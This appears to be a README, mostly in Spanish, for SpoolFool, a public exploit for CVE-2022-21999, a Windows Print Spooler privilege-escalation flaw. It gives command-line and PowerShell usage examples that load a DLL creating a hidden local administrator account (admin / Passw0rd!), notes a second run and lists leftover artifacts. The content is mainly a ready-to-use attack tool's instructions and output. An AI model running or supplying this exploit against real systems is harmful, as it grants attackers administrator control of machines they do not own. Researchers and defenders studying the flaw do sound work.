
Exploit para CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)
Exploit para CVE-2022-21999 - Vulnerabilidad de Elevación de Privilegios del Print Spooler de Windows (LPE)
El exploit proporcionado debería funcionar por defecto en todas las versiones de escritorio de Windows.
Consulte la publicación del blog para obtener todos los detalles técnicos aquí.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
La siguiente PoC utiliza una DLL que crea un nuevo administrador local admin / Passw0rd!. La DLL (AddUser.dll) y el código fuente se pueden encontrar en este repositorio.

Segunda ejecución
La siguiente PoC muestra una segunda ejecución del exploit proporcionado. Nótese que esta vez no se explota la vulnerabilidad para cargar la DLL.

Después de ejecutar el exploit, quedarán los siguientes artefactos para su limpieza posterior:
SpoolDirectory de la impresora objetivo no se restaura